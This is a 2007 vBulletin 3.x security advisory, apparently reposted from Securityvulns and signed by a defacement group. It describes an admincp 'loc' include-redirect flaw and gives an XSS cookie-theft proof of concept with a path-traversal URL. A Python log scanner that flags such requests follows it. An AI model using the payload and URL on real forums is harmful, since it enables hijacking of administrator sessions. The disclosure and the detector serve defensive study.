Securityvulns, SECURITYVULNS:DOC:17306
Jun 20, 2007 - 12:00 a.m.

New Include Redirect Bug XSS All vBulletin v 3.x.x

vulners.com

+-------------------------------------------------------------------

This injection allows an attacker to redirect the admin, through the include, to a page of the attacker's choice, effectively
running XSS in the page and stealing the cookie:

Permanent XSS (a file containing the XSS code must first be uploaded to the site). PoC:

<script>alert(document.cookie)</script>

Used together with a cookie stealer, the following is a simple attack:

http://localhost/vb/admincp/index.php?loc=../../../nez.txt

When the URL is opened, the cookies are stolen.
+-------------------------------------------------------------------
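A defender-side check for the request shape shown above, as an added example that is not part of the original advisory: it scans web access logs for admincp/index.php requests whose loc value is an absolute URL or resolves outside the admin CP directory. The log lines are constructed, the function names and the ADMIN_DIR virtual root are assumptions of this example, and it generalizes beyond the advisory's URL to percent-encoded and backslash forms of the value.

```python
import posixpath
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed access-log lines for illustration; not from a real server.
SAMPLE_LOG = """\
198.51.100.7 - - [20/Jun/2007:10:01:02 +0000] "GET /vb/admincp/index.php?loc=options.php HTTP/1.1" 200 5120
198.51.100.7 - - [20/Jun/2007:10:01:09 +0000] "GET /vb/admincp/index.php?loc=../../../nez.txt HTTP/1.1" 200 311
203.0.113.9 - - [20/Jun/2007:10:02:30 +0000] "GET /vb/admincp/index.php?loc=%252e%252e%252fuploads%252fa.txt HTTP/1.1" 200 298
203.0.113.9 - - [20/Jun/2007:10:03:11 +0000] "GET /vb/admincp/index.php?loc=http://example.invalid/x HTTP/1.1" 200 290
192.0.2.44 - - [20/Jun/2007:10:04:00 +0000] "GET /vb/forumdisplay.php?f=2 HTTP/1.1" 200 9001
"""
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
ADMIN_DIR = "/admincp"  # assumption: virtual root used only to resolve relative loc values


def classify_loc(loc):
    """Return why a loc value leaves the admin CP directory, or None if it stays inside."""
    for _ in range(3):  # undo nested percent-encoding such as %252e%252e
        decoded = unquote(loc)
        if decoded == loc:
            break
        loc = decoded
    loc = loc.replace("\\", "/")  # treat backslashes as path separators
    if re.match(r"[a-z][a-z0-9+.-]*:|//", loc, re.I):
        return "absolute-url"
    path = loc.split("?", 1)[0]
    resolved = posixpath.normpath(posixpath.join(ADMIN_DIR, path))
    if not resolved.startswith(ADMIN_DIR + "/"):
        return "path-traversal"
    return None


def suspicious_requests(log_text):
    """Return (client_ip, query-decoded loc, reason) for risky admincp/index.php requests."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.search(line)
        if not m:
            continue
        url = urlsplit(m.group(1))
        if not url.path.endswith("/admincp/index.php"):
            continue
        for loc in parse_qs(url.query).get("loc", []):
            reason = classify_loc(loc)
            if reason:
                hits.append((line.split()[0], loc, reason))
    return hits
```

Calling suspicious_requests(SAMPLE_LOG) flags the second, third and fourth sample lines and leaves the ordinary admin CP and forum requests alone.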

  • [W]orld [D]efacers [T]eam
  • Greets:
  • || rUnViRuS || - || Provide || - || HeX || - || dEv!L RoOT || + || BlackWHITE || - || dOcnok || - || A.tar0uDant.D ||
  • || Pro Hacker || - || DARKFIRE || - || papipsycho ||
  • Sp.Thanx To : Sec-Area.com Member's
+------------------------[ W D T ]----------------------------------